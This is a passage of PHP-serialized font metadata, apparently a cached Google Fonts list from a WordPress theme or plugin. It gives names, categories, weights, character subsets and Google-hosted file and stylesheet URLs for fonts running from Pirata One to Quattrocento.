One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/pirataone/v4/WnbD86B4vB2ckYcL7oxuhvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Pirata+One:regular";}}s:7:"plaster";a:7:{s:4:"name";s:7:"Plaster";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/plaster/v8/O4QG9Z5116CXyfJdR9zxLw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Plaster:regular";}}s:4:"play";a:7:{s:4:"name";s:4:"Play";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/play/v7/GWvfObW8LhtsOX333MCpBg.ttf";i:700;s:61:"http://fonts.gstatic.com/s/play/v7/crPhg6I0alLI-MpB3vW-zw.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Play:regular";i:700;s:48:"https://fonts.googleapis.com/css?family=Play:700";}}s:8:"playball";a:7:{s:4:"name";s:8:"Playball";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/playball/v6/3hOFiQm_EUzycTpcN9uz4w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Playball:regular";}}s:16:"playfair_display";a:7:{s:4:"name";s:16:"Playfair Display";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";i:4;s:3:"900";i:5;s:9:"900italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:6:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/playfairdisplay/v10/2NBgzUtEeyB-Xtpr9bm1CV6uyC_qD11hrFQ6EGgTJWI.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/playfairdisplay/v10/9MkijrV-dEJ0-_NWV7E6NzMsbnvDNEBX25F5HWk9AhI.ttf";i:700;s:94:"http://fonts.gstatic.com/s/playfairdisplay/v10/UC3ZEjagJi85gF9qFaBgICsv6SrURqJprbhH_C1Mw8w.ttf";s:9:"700italic";s:94:"http://fonts.gstatic.com/s/playfairdisplay/v10/n7G4PqJvFP2Kubl0VBLDECsYW3XoOVcYyYdp9NzzS9E.ttf";i:900;s:94:"http://fonts.gstatic.com/s/playfairdisplay/v10/UC3ZEjagJi85gF9qFaBgIKqwMe2wjvZrAR44M0BJZ48.ttf";s:9:"900italic";s:94:"http://fonts.gstatic.com/s/playfairdisplay/v10/n7G4PqJvFP2Kubl0VBLDEC0JfJ4xmm7j1kL6D7mPxrA.ttf";}s:4:"urls";a:6:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Playfair+Display:regular";s:6:"italic";s:63:"https://fonts.googleapis.com/css?family=Playfair+Display:italic";i:700;s:60:"https://fonts.googleapis.com/css?family=Playfair+Display:700";s:9:"700italic";s:66:"https://fonts.googleapis.com/css?family=Playfair+Display:700italic";i:900;s:60:"https://fonts.googleapis.com/css?family=Playfair+Display:900";s:9:"900italic";s:66:"https://fonts.googleapis.com/css?family=Playfair+Display:900italic";}}s:19:"playfair_display_sc";a:7:{s:4:"name";s:19:"Playfair Display SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";i:4;s:3:"900";i:5;s:9:"900italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:6:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/playfairdisplaysc/v5/G0-tvBxd4eQRdwFKB8dRkcpjYTDWIvcAwAccqeW9uNM.ttf";s:6:"italic";s:95:"http://fonts.gstatic.com/s/playfairdisplaysc/v5/myuYiFR-4NTrUT4w6TKls2klJsJYggW8rlNoTOTuau0.ttf";i:700;s:95:"http://fonts.gstatic.com/s/playfairdisplaysc/v5/5ggqGkvWJU_TtW2W8cEubA-Amcyomnuy4WsCiPxGHjw.ttf";s:9:"700italic";s:95:"http://fonts.gstatic.com/s/playfairdisplaysc/v5/6X0OQrQhEEnPo56RalREX4krgPi80XvBcbTwmz-rgmU.ttf";i:900;s:95:"http://fonts.gstatic.com/s/playfairdisplaysc/v5/5ggqGkvWJU_TtW2W8cEubKXL3C32k275YmX_AcBPZ7w.ttf";s:9:"900italic";s:95:"http://fonts.gstatic.com/s/playfairdisplaysc/v5/6X0OQrQhEEnPo56RalREX8Zag2q3ssKz8uH1RU4a9gs.ttf";}s:4:"urls";a:6:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=Playfair+Display+SC:regular";s:6:"italic";s:66:"https://fonts.googleapis.com/css?family=Playfair+Display+SC:italic";i:700;s:63:"https://fonts.googleapis.com/css?family=Playfair+Display+SC:700";s:9:"700italic";s:69:"https://fonts.googleapis.com/css?family=Playfair+Display+SC:700italic";i:900;s:63:"https://fonts.googleapis.com/css?family=Playfair+Display+SC:900";s:9:"900italic";s:69:"https://fonts.googleapis.com/css?family=Playfair+Display+SC:900italic";}}s:7:"podkova";a:7:{s:4:"name";s:7:"Podkova";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/podkova/v8/eylljyGVfB8ZUQjYY3WZRQ.ttf";i:700;s:85:"http://fonts.gstatic.com/s/podkova/v8/SqW4aa8m_KVrOgYSydQ33vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Podkova:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Podkova:700";}}s:10:"poiret_one";a:7:{s:4:"name";s:10:"Poiret One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/poiretone/v4/dWcYed048E5gHGDIt8i1CPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Poiret+One:regular";}}s:10:"poller_one";a:7:{s:4:"name";s:10:"Poller One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/pollerone/v6/dkctmDlTPcZ6boC8662RA_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Poller+One:regular";}}s:4:"poly";a:7:{s:4:"name";s:4:"Poly";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/poly/v7/bcMAuiacS2qkd54BcwW6_Q.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/poly/v7/Zkx-eIlZSjKUrPGYhV5PeA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Poly:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Poly:italic";}}s:8:"pompiere";a:7:{s:4:"name";s:8:"Pompiere";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/pompiere/v6/o_va2p9CD5JfmFohAkGZIA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Pompiere:regular";}}s:12:"pontano_sans";a:7:{s:4:"name";s:12:"Pontano Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/pontanosans/v4/gTHiwyxi6S7iiHpqAoiE3C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Pontano+Sans:regular";}}s:7:"poppins";a:7:{s:4:"name";s:7:"Poppins";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:85:"http://fonts.gstatic.com/s/poppins/v1/VIeViZ2fPtYBt3B2fQZplvesZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/poppins/v1/hlvAxH6aIdOjWlLzgm0jqg.ttf";i:500;s:85:"http://fonts.gstatic.com/s/poppins/v1/4WGKlFyjcmCFVl8pRsgZ9vesZW2xOQ-xsNqO47m55DA.ttf";i:600;s:85:"http://fonts.gstatic.com/s/poppins/v1/-zOABrCWORC3lyDh-ajNnPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/poppins/v1/8JitanEsk5aDh7mDYs-fYfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:5:{i:300;s:51:"https://fonts.googleapis.com/css?family=Poppins:300";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Poppins:regular";i:500;s:51:"https://fonts.googleapis.com/css?family=Poppins:500";i:600;s:51:"https://fonts.googleapis.com/css?family=Poppins:600";i:700;s:51:"https://fonts.googleapis.com/css?family=Poppins:700";}}s:16:"port_lligat_sans";a:7:{s:4:"name";s:16:"Port Lligat Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/portlligatsans/v5/CUEdhRk7oC7up0p6t0g4P6mASEpx5X0ZpsuJOuvfOGA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Port+Lligat+Sans:regular";}}s:16:"port_lligat_slab";a:7:{s:4:"name";s:16:"Port Lligat Slab";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/portlligatslab/v5/CUEdhRk7oC7up0p6t0g4PxLSPACXvawUYCBEnHsOe30.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Port+Lligat+Slab:regular";}}s:14:"pragati_narrow";a:7:{s:4:"name";s:14:"Pragati Narrow";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/pragatinarrow/v2/HzG2TfC862qPNsZsV_djPpTvAuddT2xDMbdz0mdLyZY.ttf";i:700;s:91:"http://fonts.gstatic.com/s/pragatinarrow/v2/DnSI1zRkc0CY-hI5SC3q3MLtdzs3iyjn_YuT226ZsLU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Pragati+Narrow:regular";i:700;s:58:"https://fonts.googleapis.com/css?family=Pragati+Narrow:700";}}s:5:"prata";a:7:{s:4:"name";s:5:"Prata";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/prata/v6/3gmx8r842loRRm9iQkCDGg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Prata:regular";}}s:11:"preahvihear";a:7:{s:4:"name";s:11:"Preahvihear";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/preahvihear/v8/82tDI-xTc53CxxOzEG4hDaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Preahvihear:regular";}}s:14:"press_start_2p";a:7:{s:4:"name";s:14:"Press Start 2P";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/pressstart2p/v4/8Lg6LX8-ntOHUQnvQ0E7o1jfl3W46Sz5gOkEVhcFWF4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Press+Start+2P:regular";}}s:5:"pridi";a:7:{s:4:"name";s:5:"Pridi";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:6:{i:200;s:62:"http://fonts.gstatic.com/s/pridi/v1/WvKJ-kflGuELyK4uQzpYIA.ttf";i:300;s:62:"http://fonts.gstatic.com/s/pridi/v1/Ihwk-OGVFS69PINILdqAjQ.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/pridi/v1/Mau018Ghi7LJX7FkGYCZAQ.ttf";i:500;s:62:"http://fonts.gstatic.com/s/pridi/v1/dPNOrMxU-HjLo-fvkFydsQ.ttf";i:600;s:62:"http://fonts.gstatic.com/s/pridi/v1/J0i5OZxX07KC4mby5RjNbg.ttf";i:700;s:62:"http://fonts.gstatic.com/s/pridi/v1/UhCy4jDDJttTB8k8rtWadg.ttf";}s:4:"urls";a:6:{i:200;s:49:"https://fonts.googleapis.com/css?family=Pridi:200";i:300;s:49:"https://fonts.googleapis.com/css?family=Pridi:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Pridi:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Pridi:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Pridi:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Pridi:700";}}s:14:"princess_sofia";a:7:{s:4:"name";s:14:"Princess Sofia";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/princesssofia/v4/8g5l8r9BM0t1QsXLTajDe-wjmA7ie-lFcByzHGRhCIg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Princess+Sofia:regular";}}s:8:"prociono";a:7:{s:4:"name";s:8:"Prociono";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/prociono/v6/43ZYDHWogdFeNBWTl6ksmw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Prociono:regular";}}s:6:"prompt";a:7:{s:4:"name";s:6:"Prompt";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:63:"http://fonts.gstatic.com/s/prompt/v1/ltjX-trOmfS-yKy_awt70g.ttf";s:9:"100italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/KvTeArBpVb-tA2mahV6Jk_esZW2xOQ-xsNqO47m55DA.ttf";i:200;s:63:"http://fonts.gstatic.com/s/prompt/v1/MNB_CVkbfYHFMWX_UbDC2Q.ttf";s:9:"200italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/NR0JuXzzCDKpLNVhfyEAiaCWcynf_cDxXwCLxiixG1c.ttf";i:300;s:63:"http://fonts.gstatic.com/s/prompt/v1/LzifakiWysr3N3OoAdbdpg.ttf";s:9:"300italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/ir8BhbeDHM-qnbo-tnpmt6CWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/prompt/v1/nDo1rQFnTFNua4cp-OnD2A.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/prompt/v1/ZD4khIP924SU2fRYOJkraQ.ttf";i:500;s:63:"http://fonts.gstatic.com/s/prompt/v1/w31OY1otplAgr5iZ21K7Fg.ttf";s:9:"500italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/dfaeaRx00u9arVHsaDjliaCWcynf_cDxXwCLxiixG1c.ttf";i:600;s:63:"http://fonts.gstatic.com/s/prompt/v1/uUrJjg1BGaIb6CAOlUIp9g.ttf";s:9:"600italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/CJUBMsoNNHMMdFRxm-n7p6CWcynf_cDxXwCLxiixG1c.ttf";i:700;s:63:"http://fonts.gstatic.com/s/prompt/v1/HdM_epiStzshOr-49ubVyg.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/GtXRH7QWy3aLCHoJuR5WIKCWcynf_cDxXwCLxiixG1c.ttf";i:800;s:63:"http://fonts.gstatic.com/s/prompt/v1/GF9cOamDd7mYPHNW1nZLKg.ttf";s:9:"800italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/kBLgnnEB-VXkOLFCc0pzwqCWcynf_cDxXwCLxiixG1c.ttf";i:900;s:63:"http://fonts.gstatic.com/s/prompt/v1/KFgmbwHbRBQb28VFhH3c8Q.ttf";s:9:"900italic";s:84:"http://fonts.gstatic.com/s/prompt/v1/qjrOe-lEPwDDeUu5g6q_DaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:18:{i:100;s:50:"https://fonts.googleapis.com/css?family=Prompt:100";s:9:"100italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:100italic";i:200;s:50:"https://fonts.googleapis.com/css?family=Prompt:200";s:9:"200italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:200italic";i:300;s:50:"https://fonts.googleapis.com/css?family=Prompt:300";s:9:"300italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:300italic";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Prompt:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Prompt:italic";i:500;s:50:"https://fonts.googleapis.com/css?family=Prompt:500";s:9:"500italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:500italic";i:600;s:50:"https://fonts.googleapis.com/css?family=Prompt:600";s:9:"600italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:600italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Prompt:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:700italic";i:800;s:50:"https://fonts.googleapis.com/css?family=Prompt:800";s:9:"800italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:800italic";i:900;s:50:"https://fonts.googleapis.com/css?family=Prompt:900";s:9:"900italic";s:56:"https://fonts.googleapis.com/css?family=Prompt:900italic";}}s:10:"prosto_one";a:7:{s:4:"name";s:10:"Prosto One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/prostoone/v5/bsqnAElAqk9kX7eABTRFJPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Prosto+One:regular";}}s:11:"proza_libre";a:7:{s:4:"name";s:11:"Proza Libre";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"500";i:3;s:9:"500italic";i:4;s:3:"600";i:5;s:9:"600italic";i:6;s:3:"700";i:7;s:9:"700italic";i:8;s:3:"800";i:9;s:9:"800italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:10:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/prozalibre/v1/Hg11OrfE1P_U6mKmrZPknKCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/prozalibre/v1/ClQTew5IUT7yKo8vyspLxEeOrDcLawS7-ssYqLr2Xp4.ttf";i:500;s:88:"http://fonts.gstatic.com/s/prozalibre/v1/4gjxWDPA6RMWrIls_qgQBsCNfqCYlB_eIx7H1TVXe60.ttf";s:9:"500italic";s:88:"http://fonts.gstatic.com/s/prozalibre/v1/rWq3Qp4ZlPGKduc1qkgLHGnWRcJAYo5PSCx8UfGMHCI.ttf";i:600;s:88:"http://fonts.gstatic.com/s/prozalibre/v1/4gjxWDPA6RMWrIls_qgQBpZ7xm-Bj30Bj2KNdXDzSZg.ttf";s:9:"600italic";s:88:"http://fonts.gstatic.com/s/prozalibre/v1/rWq3Qp4ZlPGKduc1qkgLHJe6We3S5L6hKLscKpOkmlo.ttf";i:700;s:88:"http://fonts.gstatic.com/s/prozalibre/v1/4gjxWDPA6RMWrIls_qgQBne1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:88:"http://fonts.gstatic.com/s/prozalibre/v1/rWq3Qp4ZlPGKduc1qkgLHM_zJjSACmk0BRPxQqhnNLU.ttf";i:800;s:88:"http://fonts.gstatic.com/s/prozalibre/v1/4gjxWDPA6RMWrIls_qgQBg89PwPrYLaRFJ-HNCU9NbA.ttf";s:9:"800italic";s:88:"http://fonts.gstatic.com/s/prozalibre/v1/rWq3Qp4ZlPGKduc1qkgLHCad_7rtf4IdDfsLVg-2OV4.ttf";}s:4:"urls";a:10:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Proza+Libre:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Proza+Libre:italic";i:500;s:55:"https://fonts.googleapis.com/css?family=Proza+Libre:500";s:9:"500italic";s:61:"https://fonts.googleapis.com/css?family=Proza+Libre:500italic";i:600;s:55:"https://fonts.googleapis.com/css?family=Proza+Libre:600";s:9:"600italic";s:61:"https://fonts.googleapis.com/css?family=Proza+Libre:600italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Proza+Libre:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Proza+Libre:700italic";i:800;s:55:"https://fonts.googleapis.com/css?family=Proza+Libre:800";s:9:"800italic";s:61:"https://fonts.googleapis.com/css?family=Proza+Libre:800italic";}}s:7:"puritan";a:7:{s:4:"name";s:7:"Puritan";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/puritan/v8/wv_RtgVBSCn-or2MC0n4Kg.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/puritan/v8/BqZX8Tp200LeMv1KlzXgLQ.ttf";i:700;s:85:"http://fonts.gstatic.com/s/puritan/v8/pJS2SdwI0SCiVnO0iQSFT_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:85:"http://fonts.gstatic.com/s/puritan/v8/rFG3XkMJL75nUNZwCEIJqC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Puritan:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Puritan:italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Puritan:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Puritan:700italic";}}s:12:"purple_purse";a:7:{s:4:"name";s:12:"Purple Purse";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/purplepurse/v5/Q5heFUrdmei9axbMITxxxS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Purple+Purse:regular";}}s:6:"quando";a:7:{s:4:"name";s:6:"Quando";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/quando/v5/03nDiEZuO2-h3xvtG6UmHg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Quando:regular";}}s:8:"quantico";a:7:{s:4:"name";s:8:"Quantico";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/quantico/v5/pwSnP8Xpaix2rIz99HrSlQ.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/quantico/v5/KQhDd2OsZi6HiITUeFQ2U_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/quantico/v5/OVZZzjcZ3Hkq2ojVcUtDjaCWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/quantico/v5/HeCYRcZbdRso3ZUu01ELbQJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:4:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Quantico:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Quantico:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=Quantico:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=Quantico:700italic";}}s:12:"quattrocento";a:7:{s:4:"name";s:12:"Quattrocento";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/quattrocento/v8/WZDISdyil4HsmirlOdBRFC3USBnSvpkopQaUR-